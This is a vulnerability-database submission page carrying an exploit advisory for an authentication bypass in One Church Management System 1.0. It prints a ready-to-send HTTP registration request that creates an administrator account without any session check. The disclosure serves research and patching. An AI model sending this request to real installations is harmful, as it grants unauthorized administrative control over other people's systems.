Submit #33217: One Church Management System 1.0 - Authentication Bypassinfo

TitelOne Church Management System 1.0 - Authentication Bypass
Beschreibung# Exploit Title: One Church Management System 1.0 - Authentication Bypass # Date: 23/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html # Version: 1.0 # Tested on: Linux Title: ================ One Church Management System 1.0 - Authentication Bypass Summary: ================ One Church Management System version 1.0 is affected by a vulnerability that allows an attacker to bypass authentication. Because of the lack of session validation, the attacker could register a user with administrative permissions over the application and gain full access to it. Severity Level: ================ 7.3 (High) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L Affected Product: ================ One Church Management System v1.0 Steps to Reproduce: ================ 1. Open a request repeater (like Burp Suite) and send this request: POST /one_church/userregister.php HTTP/1.1 Host: target.com Content-Length: 164 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/one_church/userregister.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close dignity=Admin&staffid=1000&fullname=<NICKNAME_HERE>&firstname=<FIRST_NAME>&lastname=<LAST_NAME>&mobileno=2520000000&emailid=<YOUR_EMAIL>&password=<YOUR_PASSWORD>&confirmpassword=<YOUR_PASSWORD>&signup=Register Fill in the parameters with the values according to each one of them and send the request.
Quelle⚠️ https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html?a
Benutzer
 mrempy (UID 24379)
Einreichung23.03.2022 15:11 (vor 4 Jahren)
Moderieren24.03.2022 01:28 (10 hours later)
StatusAkzeptiert
VulDB Eintrag195643 [SourceCodester One Church Management System 1.0 Session userregister.php schwache Authentisierung]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!

n $_SERVER['REMOTE_ADDR'] ?? '0.0.0.0'; } } ?>